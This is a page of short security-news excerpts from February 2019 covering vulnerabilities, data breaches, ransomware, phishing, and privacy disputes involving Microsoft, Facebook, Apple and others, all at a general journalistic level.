Repairs & Upgrades

February 22, 2019 »

Microsoft fixes web server DDoS bug

By Danny Bradbury

Microsoft has fixed a bug that could have led to distributed denial of service (DDoS) attacks on its web server software.

The flaw lay in the way that Internet Information Server (IIS) processed requests sent using HTTP/2.

Ratified in 2015, HTTP/2 is an enhanced version of the original HTTP standard that includes better flow control and handles a wider variety of connections between clients and servers.

Flow control in HTTP/2 enables a client computer to describe how it wants to receive information from the sender so that it can work more efficiently.

For example, you might ask your browser to stream a high-bandwidth video, but then pause the video halfway through.

With HTTP/2, the browser can use flow control to pause the delivery and buffering of the video and concentrate on downloading something else that is suddenly more important, such as a real-time ticker update.


Flash “security bypass” list hidden in Microsoft Edge browser

By John E Dunn

Until this month, Microsoft’s Windows 10 Edge browser could skip over its own “Are you sure?” warnings about Flash content on 58 websites, thanks to a bypass list kept hidden from users.

Google Project Zero researcher Ivan Fratric said he stumbled on the list last November when he analysed domain hashes inside the edgehtml¬≠plugin¬≠policy.bin file.

Fratric eventually resolved 56 of the 58 hashes to be a bypass list of domains that included Facebook, MSN, Deezer, and Yahoo Japan, which all contain some legacy Flash content.

Having a bypass list built into Edge is risky, says Fratric.

Flash is well-known for vulnerabilities, which is why users are regularly reminded either to run it only when necessary or, better still, not run it at all.

Although the setting had limitations (the content must be hosted on the same domain or larger than 398×298 pixels), Fratric said he was alarmed at the reasoning behind having a list of this sort inside Edge that users know nothing about.


Facebook lets Android users block location tracking

By Lisa Vaas

Last week, CNBC reported that Facebook looks up users’ location data when it thinks they’re a threat to the company’s employees or facilities.

Until recently, granting an Android app access to your location was an all-or-nothing deal: you either had to turn off location and prevent the app from seeing your location at all, or you had to grant it full use of your location, even when you weren’t using the app.

That’s how Android works: Google requires that apps get permission to use your location, but unlike iOS, it doesn’t offer an option to share your location only when the app is in use.

This all changed on Wednesday this week when Facebook announced that it will be updating its location controls on Android to give people more choice over how the company collects location information and how the platform stores it.

Facebook said that it’s not making any changes to the choices that users have previously made, nor is it collecting any new information as a result of the update.


Facebook hoax? Can you sniff out gas station card skimmers using Bluetooth?

By Lisa Vaas

There’s a “helpful tip” making the Facebook rounds, and it’s a little bit helpful but a lot not so much.

It’s about using Bluetooth to detect credit card skimmers at gas stations:

Here is a helpful tip:

When you pull up to a gas station to fill your car. Search your phone for Bluetooth devices. If a sequence of letters and a sequence of numbers shows up in your device list do not pay at the pump. One of the pumps have a card reader installed. All card readers are Bluetooth.

The post refers to a card “reader,” but what it means is card “skimmer.”

The first is a legal way for you to pay, while the latter is a piece of thief-ware, be it a plastic gadget clumsily glued on to the face of an ATM or gas pump or technology that’s installed internally.

Credit card skimmers are devices that capture details from a payment card’s magnetic stripe, then (sometimes) beam them out via Bluetooth to nearby crooks.

The “sometimes” is just one thing that makes this viral post less than helpful.

Security journalist Brian Krebs has cataloged all sorts of skimmers, including some that send information to fraudsters’ phones via text message.


February 20, 2019 »

Hackers unleash social media worm after bug report ignored

By Danny Bradbury

What happens when you report a vulnerability to a website and it completely ignores your request, in spite of running a bug bounty program that’s supposed to pay for disclosures?

Some hackers might just walk away, but a group of app developers in Russia chose another approach. They used the vulnerability to spam thousands of users on Russia’s largest social network.

The group, called Bagosi, develops apps that run on St Petersburg-based VKontakte (VK), a social network with over 500m users owned by Russian Internet company

According to ZDNet, the group discovered a vulnerability in the social network and alerted developers there a year ago.

In a post on VKontakte, Bagosi explained that the social network ignored the bug report and didn’t pay the person that discovered it for their submission or acknowledge it in any way. This is in spite of the fact that VKontakte runs a bug bounty program with Hacker One. VK told Naked Security that the program has been running since 2015 and has paid out $250,000 in bounties. However, Hacker One also told us that the VK program is self-managed, meaning that the social network handles bug reports using its own internal teams rather than relying on Hacker One’s employees.


Facebook tracks users it thinks may harm its employees

By Lisa Vaas

Have you ever been so enraged at Facebook that you’ve messaged CEO Mark Zuckerberg and told him to f— off? …or maybe you simply left that type of comment in a post somewhere on Facebook or one of its apps?

If so, you might well have been inducted into what CNBC reports is the company’s BOLO watch list. That’s an acronym for Be On Lookout: a list of hundreds of people who have threatened Facebook or its staff, sulked over losing a contract, or gotten fired, be it with or without sulking or emotional outbursts.

Keeping a list like that is not, in itself, unusual. Lots of companies keep similar lists, according to CNBC’s sources, which include former security staff from Facebook who are familiar with its program and at least one expert from the physical security field: Tim Bradley, senior consultant with Incident Management Group, a corporate security consulting firm that deals with employee safety issues.

What’s unique about Facebook’s approach to BOLOs is that it doesn’t just disseminate a list of names to security staff. Facebook also mines its platform for threatening posts. Sometimes, Facebook goes so far as to use its apps to discern the whereabouts of people whom it finds threatening, to determine whether they pose a credible threat.

CNBC talked to more than a dozen former Facebook security employees, some of whom questioned the ethics of Facebook’s security strategies. One former security staffer called the tactics “very Big Brother-esque.”


Google’s working on stopping sites from blocking Incognito mode

By Lisa Vaas

Google Chrome’s Incognito mode hasn’t been an impenetrable privacy shield: For years, it’s been a snap for web developers to detect when Chrome users are browsing in private mode and to block site visitors who use it.

Google’s known all about it. And finally, 9to5Google reports, it looks like the company plans to close the loophole that’s enabled sites to detect when you’re using Incognito mode.

That loophole: websites have detected Incognito mode by trying to use an API that the mode turns off.

There are many ways to detect Incognito mode: as 9to5Google suggests, if you search for “how to detect Incognito mode,” you’ll find that developers have contributed ways to do so on Stack Overflow.

One easy way has been to sniff out that API: a developer can simply try to use Chrome’s FileSystem API, which is disabled in Incognito mode. That API is used by apps to store files, be it temporarily or more permanently. Incognito shuts it off entirely so that the API won’t create permanent files that could jeopardize somebody’s privacy.


Facebook flaw could have allowed an attacker to hijack accounts

By John E Dunn

If you’re a security researcher in search of a fat bug bounty, Facebook must look like a good place to start your next hunt.

The site has suffered a lot of niggling security flaws in recent times, to which can now be added a new Cross Site Request Forgery (CSRF) protection bypass flaw that could have allowed an attacker to hijack a user’s account in several ways.

Discovered by researcher ‘Samm0uda’ in January, the problem centers around what is technically known as a vulnerable URL “endpoint”, in this case  Explains the researcher:

This endpoint is located under the main domain which makes it easier for the attacker to trick his victims to visit the URL.

CSRF attacks happen when an cybercriminal tricks the user into clicking on a malicious link that submits instructions to the vulnerable site that appear to come from the user’s browser.

All that is required for this to work is that the user must be authenticated (i.e. logged in) when this happens, although the victim remains unaware that anything untoward is happening.

The technique has been popular for years, which is why websites use anti-CSRF tokens that are reset every time there is a state-changing request.


Millions of “private” medical helpline calls exposed on internet

By Paul Ducklin

Thanks to Sophos security expert Petter Nordwall for his help with this article.

You know when you call a helpline and a cheery voice advises you that your call may be recorded for a variety of reasons, all of which are supposed to be for your benefit?

Have you ever wondered what happens to all those recordings?

Could something you said confidentially on the phone back in 2014 – personal and private information disclosed during a call to an official medical advice line, for example – suddenly show up in public in 2019?

As millions of people in Sweden are suddenly realizing, the answer is a definite “Yes”.

One of the subcontractors involved in running the Swedish medical assistance line 1177 (a bit like 111 in the UK – the number you use for urgent but not emergency medical help) apparently left six years’ worth of call records – 2,700,000 sound files in WAV and MP3 format – on a server that was openly accessible on the internet.

All you’d have needed was a web browser to scroll through and download years of confidential calls.


Thousands of Android apps bypass Advertising ID to track users

By John E Dunn

Six years after it was introduced, it looks as if Android’s Advertising ID (AAID) might no longer be the privacy forcefield Google claimed it would be.

New research by AppCensus has found that 18,000 Play Store apps, many with hundreds of millions of installs, appear to be sidestepping the Advertising ID system by quietly collecting additional identifiers from users’ smartphones in ways that can’t be blocked or reset.

Among the best-known offenders were news app Flipboard, Talking Tom, Clean Master AV Cleaner & Booster, Battery Doctor, Cooking Fever, and Cut the Rope Full Free, which were found to be sending data to advertising aggregators.

But what is the Advertising ID and why does it matter?

Few Android users pay much attention to it, but in 2013 the Advertising ID seemed like a great idea.

At that time, apps were allowed to collect a lot of data unique to the user’s device, such as its Android ID, IMEI number, hardware MAC address, and SIM serial card number – any one or combination of which could be used to track and profile users.


February 19, 2019 »

If you think your deleted Twitter DMs are sliding into the trash, you’re wrong

By Lisa Vaas

You can’t erase your Twitter footsteps, it turns out: what goes into Twitter stays lodged in its guts for years.

That’s because of a glitch that a bug hunter is calling a “functional bug.” The bug, discovered by security researcher Karan Saini, keeps direct messages (DMs) from being completely deleted, regardless of whether you or others have deleted the messages or even if the accounts that sent or received the DMs have been deactivated and suspended.

Saini told TechCrunch that he found years-old messages in a file when he downloaded an archive of his data from Twitter accounts that he’d previously deleted.

You can download data from your own account(s) here to get an idea of everything that Twitter collects, and retains, on you.

The researcher says that he reported a similar bug, found a year earlier but not disclosed until now, that allowed him to use a since-deprecated API to retrieve DMs even after a message was deleted from both the sender and the recipient. That earlier bug couldn’t get at DMs from suspended accounts, however.


Facebook acts like a law-breaking ‘digital gangster’, says official report

By Lisa Vaas

On Sunday, following an investigation of more than a year, the UK Parliament accused Facebook of thumbing its nose at the law, having “intentionally and knowingly violated both data privacy and anti-competition laws”.

Lawmakers called for the Information Commissioner’s Office (ICO) to investigate the social media platform’s practices, including how it uses the data of both users and users’ friends, as well as its use of “reciprocity” in data sharing.

Their report, which centered on disinformation and fake news, was published by a House of Commons committee – the Digital, Culture, Media and Sport Committee – that oversees media policy. From that report:

Companies like Facebook should not be allowed to behave like ‘digital gangsters’ in the online world, considering themselves to be ahead of and beyond the law.

The investigation focused on Facebook’s business practices before and after the Cambridge Analytica scandal.

Facebook shouldn’t be allowed to wriggle out from under culpability for the content users have pushed through on its platforms, the report said, alluding to how it was used by foreigners to tinker with the 2016 US presidential election and the Brexit campaign:

Facebook’s handling of personal data, and its use for political campaigns, are prime and legitimate areas for inspection by regulators, and it should not be able to evade all editorial responsibility for the content shared by its users across its platforms.

Facebook: Bring it!


Fake text generator is so good its creators don’t want to release full version

By Danny Bradbury

Researchers at Elon Musk’s AI think tank OpenAI have created what amounts to a text version of a deepfake – and it’s too scared for humanity to release the full version.

Its AI writing tool generates reasonable-looking text on a wide range of subjects. It is based on research that the organization did to predict the next word in a sequence of text, it explains in a blog post on the topic. The tool takes a sample piece of text written by a human and then writes the rest of an article, producing dozens of sentences from a single introductory phrase.

The tool doesn’t discriminate between topics. Instead, it uses over 40Gb of text gathered from the internet to help it produce convincing-sounding copy on anything from Miley Cyrus to astrophysics.

The problem is that while the copy sounds convincing, all the facts in it are fabricated. The tool writes names, facts and figures effectively synthesized from something that the system read online. It’s like an electronic version of that old school friend who you regrettably accepted a Facebook invitation from and who now keeps writing bizarre posts with ‘alternative facts’. For example, it takes the following phrase…

A train carriage containing controlled nuclear materials was stolen in Cincinnati today. Its whereabouts are unknown.

…and builds an entire news story around a fictional event. It fabricates a quote from Tom Hicks, who it says is the US Energy Secretary. At the time of writing, that role is occupied by Rick Perry.


Mega-crackers back with nearly 100 million new stolen data records

By Paul Ducklin

The cracker who recently put 620 million breached records up for sale…

…is back with close to 100 million more, according to reports.

Just over five years ago, we jokingly coined the phrase “one hundred million club”, following Adobe’s then-epic leaking of 150 million records.

Back then, breaches with that many records exposed at the same time were rare.

These days, we frequently hear of breaches that are well above 100 million records, for all that they often involve aggregated breaches of multiple servers and services, possibly collected over many years.

For example, we recently saw Collection #1 hit the underground market, with more than 700,000,000 unique records, closely followed by four more breach collections, imaginatively named Collection #2 to #5, with a further 2.2 billion items.


February 18, 2019 »

Opera integrates a cryptocurrency wallet – is this Web 3.0?

By John E Dunn

When it appears in the next few weeks, the latest version of Opera (“Reborn 3” or “R3”) for Windows, Mac and Linux will become the first mainstream desktop browser to integrate a cryptocurrency wallet.

If you believe cryptowallets are about to a become an important way to pay for things on the web, this will sound like another tick in the box for a Chromium-based browser that is still innovating furiously to stay in touch with Chrome, Safari and Firefox.

Alternatively, if you don’t use cryptowallets, you’ll wonder what all the fuss is about – what’s the big deal about a browser with a desktop wallet when there are already plenty of standalone mobile decentralized apps (DApps) that do the same job.

To begin answering this question, in December, Opera Mobile for Android integrated an Ethereum (ETH) Web3 API wallet of its own (served through a platform called Infura), effectively turning its mobile browser into a convenient interface for managing cryptocurrency.

This integrates with the wallet inside Opera R3, which avoids having to have a separate wallet for Windows or Mac as well as providing an easy way for the mobile device to authenticate desktop transactions using something as simple as a fingerprint.


Will the EU’s new copyright directive ruin the web?

By Lisa Vaas

The Mars Rover wasn’t the only thing to die last Wednesday. The EU also took another copyright-focused step toward killing the freedom to use memes and what critics say will be the death of the web as a place to freely exchange information.

That tweet comes from one of many people who were concerned when the European Parliament on Wednesday finalized text in the Copyright Directive: legislation whose purpose is to drag copyright law into the digital age and ensure that content creators get paid for their work, be it newspaper copy, music or other copyrighted content.

Due to widely loathed articles in the directive, it or its articles have been called the ‘meme killer’, the ‘link tax’ and the ‘censorship machine’. Those articles, Articles 11 and 13, remain intact in the final text, as final efforts to remove them have failed.

At this point, the only thing standing in the way of the Copyright Directive becoming law is a full vote by the European Parliament and European Council.


Apple fighting pirate app developers, will insist on 2FA for coders

By Paul Ducklin

Remember how the world’s biggest social network got into trouble with Apple recently over an app called Facebook Research?

The app wasn’t designed for general use – in fact, Facebook couldn’t make it openly available to everyone because it was too snoopy to be allowed in the App Store.

Amongst other things, it peeked into some or all of the network traffic from your other apps, with the goal of improving Facebook by learning more about how people behaved online.

Keeping low-level tabs on what other apps are up to isn’t permitted in regular iPhone software, so Facebook got around these restrictions by offering the app in a limited-access version under Apple’s Enterprise Certificate programme.

That’s the system that businesses can use to write, build and digitally sign apps for their own staff without waiting for Apple to sign the app into the App Store first.

Simply put, it’s the closest thing that Apple has to Google’s “allow apps from unknown sources” option in Android, and it’s the only way, short of jailbreaking, to install software on an iPhone without going to the App Store.


Judge won’t unseal legal docs in fight to break Messenger encryption

By Lisa Vaas

On Monday, a federal judge ordered that legal documents about the government’s fight to force Facebook to break Messenger encryption will be kept secret, Reuters reports.

In doing so, the judge denied motions from the American Civil Liberties Union (ACLU), the Washington Post and other groups that sought to unseal a federal court’s order to force Facebook to wiretap Messenger conversations, which are encrypted end to end.

The case concerned encrypted voice conversations. Investigators wanted to listen in on the conversations as part of an investigation into MS-13, a violent international gang that originated in Los Angeles. The law had already been listening in on ordinary phone calls and Messenger texts between the alleged gang members, but there were reportedly three Messengers calls that they couldn’t hear.

Reuters reports that the suspects on those calls were arrested anyway.

Spokespeople for the ACLU and the DOJ declined to comment, and Facebook’s arguments are sealed. However, US District Judge Lawrence O’Neill, in Fresno, California, reportedly wrote that Facebook was in favor of unsealing the documents, while the DOJ was not.


Should we profit from the sale of our personal data?

By Lisa Vaas

You are worth $7.37 to Facebook. You are worth $2.83 to Twitter. You are worth 30 cents to Reddit.

Dagnabbit, it’s time to cash in!

That’s the cry from newly minted California Governor Gavin Newsom, who, in delivering his first state of the state address on Tuesday, said it’s time for the state’s consumers to get a cut of the profit tech companies are making by selling users’ personal data.

He asked his aides to cook up a proposal for a “data dividend” to enrich the financial portfolios of California residents, but he gave no hint as to how that might work. Would Twitter cut each user a check? Would Facebook be hit up with a new tax?

We’ll have to wait and see, but in the meantime, Newsom said, these tech giants are rolling in data-derived dough:

Companies that make billions of dollars collecting, curating and monetizing our personal data have a duty to protect it. California’s consumers should also be able to share in the wealth that is created from their data.

Earlier this week, our worth to social media networks was estimated by Axios, which got to those you-are-worth-pennies estimates by pretty much just dividing the platforms’ annual revenues by their numbers of monthly active users.


Chinese facial recognition database exposes 2.5m people

By Danny Bradbury

A company operating a facial recognition system in China has exposed millions of residents’ personal information online.

Shenzen-based SenseNets is an artificial intelligence company that uses a network of tracking cameras to spot people and log their movements in its database. Unfortunately, the company exposed that information publicly online allowing anyone to access the information in plain text, it emerged this week.

Dutch cybersecurity researcher Victor Gevers found the vulnerable database online and tweeted about it.

The database housed records on over 2.5m people, including their gender, nationality, address, date of birth, photo, and employer. A lot of this was linked to their ID card number, which was also revealed in the database records. China maintains a compulsory national identity card system for residents.

SenseNet maintained a collection of trackers which logged whomever it identified in the database. This created over 6.6m logged entries in a single 24-hour window, Gevers revealed.


Photography site 500px resets 14.8 million passwords after data breach

By John E Dunn

Photography website 500px has become the latest online brand to admit suffering a serious data breach.

In an advisory, the company said it became aware of the breach last week. It estimates that the breach took place around 5 July last year.

This affected the majority of the site’s nearly 15 million users, who should shortly receive an email asking them to change their passwords as soon as possible.

Data stolen included names, usernames, email addresses, birth date (if provided), city, state, country, and gender. Also at risk:

A hash of your password, which was hashed using a one-way cryptographic algorithm.

The company hasn’t said which hashing algorithms were in use beyond mentioning that any using the obsolete MD5 function were being reset.

The fact it was using MD5 at all is not terribly reassuring for reasons Naked Security has previously discussed at some length.

A sliver of good news:

At this time, there is no indication of unauthorized access to your account, and no evidence that other data associated with your user profile was affected, such as credit card information (which is not stored on our servers), if used to make any purchases, or any other sensitive personal information.

Who is affected?

Everyone who had an account with 500px on or before 5 July 2018 may be affected by the breach. Users who joined after that will also have to change their passwords (which initiates automatically the next time a user tries to log in) although they will receive notification to do this later than the bulk of affected account holders.


Inside a GandCrab targeted ransomware attack on a hospital

By Mark Stockley

Thanks to Sophos experts Vikas Singh and Peter Mackenzie for the research in this article.

Just before 9pm on Sunday, 3 February 2019, a GandCrab executable sparked into life for an instant, before its brief existence was snuffed out by antivirus software. Stopped in its tracks, the malware triggered the first of what would quickly become hundreds of separate alerts for a US healthcare provider in the grip of a targeted ransomware attack.

The organisation’s network of about 500 computers found itself fending off two attacks involving GandCrab ransomware. Because some of the computers on the network weren’t protected by antivirus, the attack provides an unusually colourful illustration of both how a targeted ransomware attack happens, and how different layers of protection interact in defense.

This is how the attack unfolded and how you can stop it happening to you.


Ransomware is malware that encrypts the contents of a computer and then demands a ransom in return for decrypting it. Ransomware is normally distributed in large scale, untargeted attacks that use malicious websites or email attachments to infect as many victims as possible. Victims are typically asked to pay a few hundred dollars’ worth of Bitcoin to free themselves from the ransomware’s grip.


What’s behind this 1,000-character phishing URL?

By Danny Bradbury

Phishing sites are common, but this week the internet found a strange strain that’s a little rarer: a phishing site with a URL almost a thousand characters long. Experts have a good theory about why a scammer would go to all that trouble.

Bleeping Computer learned of a strange phishing campaign which uses an unusually long URL. The mail purports to come from your email provider, telling you that your account has been blacklisted due to multiple login failures. The phisher tries to hook your mail login credentials by getting you to log in again, but of course, the link it provides isn’t really a link to your login provider’s page.

Phishing links generally arrive behind an innocuous piece of text like ‘log in’, ‘reauthorise’ or ‘validate’. Hyperlinks separate the text from the actual links that they follow, though, and unless a victim hovers over the text or right-clicks it, or checks the address bar of their browser after clicking on the link, they won’t know what sites they’re really visiting.

Phishers are aware of this and diligent ones will try to lure you with a URL that looks plausible. They’ll use tricks like top-level domains (TLDs) designed to look like the last couple of words in a legitimate domain, or homographs that use foreign character sets to create English-looking letters. Hyphens and subdomains are also a good way of creating URLs that look like a legitimate site at first glance.


January 14, 2019 »

Another flaw found in macOS Mojave’s privacy protection

By John E Dunn

Ever since Apple announced enhanced privacy protection for macOS Mojave 10.14 last September, a dedicated band of researchers has been poking away at it looking for security flaws.

Embarrassingly for Apple, it’s not proved a tough challenge with the first turning up on launch day when one researcher reported a surprising bypass of privacy protection using an ordinary app (i.e. no admin permission) to access the address book.

Accessed via System Preferences > Security & Privacy > Privacy, other reported bypasses followed soon after, all apparently addressed by updates to Mojave.

Last week, just when it looked as if Apple might have got on top of the issue, StopTheMadness browser extension developer Jeff Johnson announced a new issue affecting all versions of Mojave including the 10.14.3 supplemental update released only days earlier.

According to Johnson, he discovered a way to access ~/Library/Safari without asking the system or user for permission – a directory that should only be accessible via privileged apps such as the macOS Finder.

There are no permission dialogs, it Just Works™. In this way, a malware app could secretly violate a user’s privacy by examining their web browsing history.

The only caveat was that the bypass doesn’t work for sandboxed apps and applied to those running outside that as “notarised” apps (i.e. those signed by a Developer ID that have passed Apple’s automated malware checks).


Evil USB O.MG Cable opens up Wi-Fi to remote attacks

By Lisa Vaas

Take a look at one of your USB cables and you’ll probably see an icon. It might look like a trident, with a vector, circle and square stemming off the main branch.

What do those three symbols mean? You can find multiple suggestions online. We’re less inclined to believe that it was created by Al Gore to represent a three-pronged attack on the earth, and more comfortable with the suggestion that the icon likely indicates that the cable delivers three things: data, power, and audio/video.

Well, thanks to a tinkerer, that USB icon is going to need a fourth tine, perhaps ending in an image of a burglar – because he’s rigged a USB cable to allow remote attackers to attack via Wi-Fi. Security researcher Mike Grover, who goes by the alias MG, has implanted this open door into a USB-C cable that looks like any other innocuous cable you’d see lying around in a conference room.

Why bother with USB drives? They’re already suspicious enough. Go for the cable instead, his thinking was.

The cable, dubbed the O.MG Cable, can be plugged into a Linux, Mac or Windows computer and allows attackers to execute commands over Wi-Fi as if they were sitting in front of the system, issuing commands with a mouse and keyboard.

That’s because the operating system detects the cable as part of an input device, or what’s known as a human interface device (HID). Because operating systems consider HID devices to be input devices, they can be used to input commands as if those commands are being typed on a keyboard.


620 million records from 16 websites listed for sale on the Dark Web

By Lisa Vaas

The pockets of credential stuffers and spammers have been potentially fattened by another 617 million pilfered accounts, hacked out of 16 websites and now allegedly up for sale on the Dark Web.

The Register reports that a seller on the Dream Market – a Dark Web marketplace hidden by the encrypted layers of Tor – began offering these stolen databases with this many accounts on Monday:

  • Dubsmash: 162 million
  • MyFitnessPal: 151 million
  • MyHeritage: 92 million
  • ShareThis: 41 million
  • HauteLook: 28 million
  • Animoto: 25 million
  • EyeEm: 22 million
  • 8fit: 20 million
  • Whitepages: 18 million


Security firm beats Adobe by patching reader flaw first

By Danny Bradbury

Adobe has patched a flaw that enabled attackers to slurp a user’s network authentication details – but not before someone else patched it first.

Security researcher Alex Inführ discovered a flaw in Adobe Reader which enabled a malicious PDF file to trigger a callback from the program. A compromised program would communicate with a server using Microsoft’s SMB protocol, sending it the user’s hashed authentication details.

The flaw stemmed from the XML Form Architecture (XFA), which is an XML structure inside a PDF that enables users to fill out forms. Loading a remote XML-based stylesheet relating to XFA with an insecure HTTPS-based URL prompts a file to ask for user confirmation before visiting that URL. By using a Universal Naming Convention (UNC) path, the attacker can stop that security dialog appearing. The result is that the infected file causes the user’s machine to send their NTML (NT Lan Manager) v2 hash to the attacker.

That’s pretty significant, because this hash is the digest of a password for the Windows NT Lan Manager authentication protocol. Various hackers have already detailed methods of cracking the NTLMv2 hash using automated tools.


February 12, 2019 »

Russian ISPs plan internet disconnection test for entire country

By John E Dunn

At a time and date during 2019 yet to be confirmed, Russia’s major ISPs will in unison temporarily disconnect their servers from the internet, effectively cutting the country off from the outside world.

From the point of view of Russian internet users, everything will appear normal – as long as they are connecting to websites hosted in Russia, which will still work. Anything beyond its borders will suddenly become unavailable, presumably with a message telling them why. It’s not clear how long the test disconnection will go on for.

According to a translated report by Russian news agency RosBiznesKonsalting (RBK), the aim will be to test the feasibility of a concept dubbed the “sovereign RuNet”, or the Russian Internet.

A draft law proposing such a thing reached Russia’s parliament in December, since when the implications of the test disconnection, however temporary, have dawned on nervous local ISPs.

ISPs want more money to help with the test, as well as guarantees they won’t be saddled with the bill to implement a separate proposed system of control in which internet traffic will be routed via the country’s telecom regulator, Roskomnazor.


Apple sued for ‘forcing’ 2FA on accounts

By Lisa Vaas

New York resident Jay Brodsky has filed a class action lawsuit against Apple, claiming that the company forces users into a two-factor authentication (2FA) straitjacket that they can’t shrug off, that it takes up to five minutes each time users have to enter a 2FA code, and that the time suck is causing “economic losses” to him and other Apple customers.

The lawsuit, filed on Friday in Newport Beach, California, is accusing Apple of “trespass,” based on Apple’s “locking [Brodsky] out” of his devices by requiring 2FA that allegedly can’t be disabled after two weeks.

From the filing:

Plaintiff and millions of similarly situated consumers across the nation have been and continue to suffer harm. Plaintiff and Class Members have suffered economic losses in terms of the interference with the use of their personal devices and waste of their personal time in using additional time for simple logging in.

The reference to two weeks comes from support email that Apple sometimes sends out to Apple ID owners after it enables 2FA. That email contains what the lawsuit claims, with italicized emphasis, is an unobtrusive last line that says that owners have two weeks to opt out of 2FA and go back to their previous security settings.


Kids as young as eight falling victim to online predators

By Maria Varmazis

Barnardo’s, a major children’s charity in the UK, has found that children as young as eight are being sexually exploited online via social media. In prior years, the youngest respondents to the Barnardo’s survey were 10, suggesting an unfortunate downward trend in progress.

The newest draw for young children, and sadly those who prey on them, is live streaming. Barnardo’s says that video streaming apps like TikTok, as well as streaming within already-popular apps like Instagram, are both extremely popular and very hard to moderate. When you add in the real-time comments posted directly to the person streaming, unfortunately you have an environment that’s ripe for exploitation.

Just last year, Barnardo’s ran a survey via YouGov in the UK and found 57% of 12-year-olds surveyed and 28% of 10-year-olds had live-streamed content on apps that are supposed to be used only by over-13s. In addition, about a quarter of the 10 to 16-year-olds surveyed said they regretted something they had posted online via live streaming.

Barnardo’s Chief Executive Javed Khan:

It’s vital that parents get to know and understand the technology their children are using and make sure they have appropriate security settings in place. They should also talk to their children about sex and relationships and the possible risks and dangers online so children feel able to confide in them if something doesn’t feel right.

Contrary to some popular opinion on the subject, Barnardo’s says that based on the children they have helped, there’s no typical profile of a child who tends to fall victim to sexual exploitation online. The stereotype of the child from a troubled home being a ripe target for exploitation online doesn’t appear to hold true.


Brave browser explains Facebook whitelist to concerned users

By Danny Bradbury

Privacy-conscious web browser company Brave was busy trying to correct the record this week after someone posted what looked like a whitelist in its code allowing its browser to communicate with Facebook from third-party websites.

Launched in 2016, Brave is a browser that stakes its business model on user privacy. Instead of just serving up user browsing data to advertisers, its developers designed it to put control in the users’ hands. Rather than allowing advertisers to track its users, the browser blocks ad trackers and instead leaves users’ browsing data encrypted on their machines. It then gives users the option to receive ads by signaling basic information about their intentions to advertisers, but only with user permission. It rewards users for this with an Ethereum blockchain-based token called the Basic Attention Token (BAT). Users can also credit publishers that they like with the tokens.


Facebook defends gun-law loophole firm as “political advertisers”

By Lisa Vaas

A gun safety group has criticized Facebook for taking what The Telegraph reports is millions of dollars in advertising money to sell permits to carry concealed weapons to people who lack real-life training in handling firearms.

The Telegraph quoted David Chipman, a senior policy adviser at the Giffords Law Center to Prevent Gun Violence as well as a former SWAT team officer who has a concealed carry permit:

A company has choices to make, to look if it’s in the interests of their company to support people carrying guns that haven’t been trained to use them.

I would just want [Facebook] to make that decision with eyes wide open. You don’t get that training by answering multiple guess questions on the internet.

Facebook’s records reportedly show that the platform has taken in at least $3.7 million since May, advertising what’s called the “Virginia loophole”.

The Virginia loophole

Virginia, a gun-friendly state, allows people from other states to take an online class, pay a $100 fee and, after a background check, get a concealed “non-resident” carry license.

As local Texas station WFAA reported in May 2018, some other US states will honor the Virginia non-resident license, in spite of applicants never having to show that they know how to load a gun or shoot safely.


Crypto mirror on the wall, who’s the smartest of them all?

By Paul Ducklin

A recent BBC TV series entitled Icons asked the question, “Who was the greatest person of the 20th century?”

That’s a huge and controversial question in any country, in any language, in any category – and, as you can imagine, the answer’s even bigger, and no doubt even more controversial.

There were seven categories: Artists & Writers, Sports Stars, Activists, Entertainers, Scientists, Explorers and Leaders.

The nominees had to be both important and influential – people whom you’d recognise not only for being top in their field, but also for the significance of what they did.

For example (these are off the top of our head): George Orwell, Jesse Owens, Mohandas Gandhi, Dame Vera Lynn, Rosalind Franklin, Sir Edmund Hillary and Nelson Mandela.

In fact, only one of the people listed above made the final seven…

…and didn’t win.


McDonalds app users hatin’ it after being hacked by hungry hamburglars

By Danny Bradbury

At least two users of the McDonalds mobile app aren’t lovin’ it after thieves hijacked their accounts and ordered hundreds of dollars of food for themselves.

Lauren Taylor of Halifax, Nova Scotia was shocked to find her bank account almost empty after someone used the McDonald’s mobile app to buy $500 of fast food over 1200 kilometers away in Montreal, Quebec.

The crook managed to compromise her account to run up the bills in a five-day period from 25-29 January. Every time the hungry hijacker scored a Big Mac and fries, a receipt showed up in her inbox. Unfortunately, she doesn’t check her email that regularly. By the time she did, she had just $1.99 left. She explained that she had to find rent, and presumably someone in Montreal had to find a larger pair of pants with an elasticated waist.

After ordering food through the McDonalds app, customers can check in when they reach the restaurant. The app then charges the debit card that they registered onto the system, and a member of staff will deliver it to them curbside. To get the food, the customer has to provide a four-digit code given to them by the app.

McDonalds Canada denied that there was a security problem with the app in an email to Canada’s CBC. A spokesperson said:

We take appropriate measures to keep personal information secure, including on our app. Just like any other online activity, we recommend that our guests use our app diligently by not sharing their passwords with others, creating unique passwords and changing passwords frequently.

Taylor claims that she did, though, arguing that she changes her passwords regularly, never shares them, and keeps them strong. The McDonalds app requires passwords to be eight to 12 characters long, with upper and lowercase characters and at least one number.


February 7, 2019 »

Jack’d dating app is showing users’ intimate pics to strangers

By Lisa Vaas

Dating/hook-up app Jack’d is publicly sharing, without permission, photos that users think they’re sharing privately.

The Android version of the app has been downloaded 110,562 times from Google’s Play store, and it’s also available on iOS.

Jack’d is designed to help gay, bi and curious guys to connect, chat, share, and meet on a worldwide basis. That includes enabling them to swap private and public photos.

But as it turns out, what should be its “private” photos… aren’t.

Unfortunately, as the Register reported on Tuesday, anyone with a web browser who knows where to look can access any Jack’d user’s photos, be they private or public – all without authentication or even the need to sign in to the app. Nor are there any limits in place: anyone can download the entire image database for whatever mischief they want to get into, be it blackmail or outing somebody in a country where homosexuality is illegal and/or gays are harassed.

The finding comes from researcher Oliver Hough, who told the Register that he reported the security bug to the Jack’d programming team three months ago. Whoever’s behind the app hasn’t yet supplied a fix for the security glitch, which the Register has confirmed.


Firefox 66 will silence autoplaying web audio

By John E Dunn

Quieter web browsing is finally within reach for users of Mozilla’s Firefox.

It’s been on the to-do list for a while, but a new blog by the company has confirmed that from Firefox 66 for desktop and Firefox for Android, due on 19 March, media autoplay of video or audio will be blocked on websites by default.

According to Mozilla’s developer blog, this means:

We only allow a site to play audio or video aloud via the HTMLMediaElement API once a web page has had user interaction to initiate the audio, such as the user clicking on a ‘play’ button.

Until the user does something to initiate a video or audio stream, the only thing that will be possible is muted autoplay.

If you find it annoying when videos starting of their own accord, this will come as a welcome news. But what about use cases where it’s desirable?

Currently, it is possible to achieve autoplay blocking by toggling a setting from about:config (type that into your Firefox address bar), but that is a global setting and is either on or off.

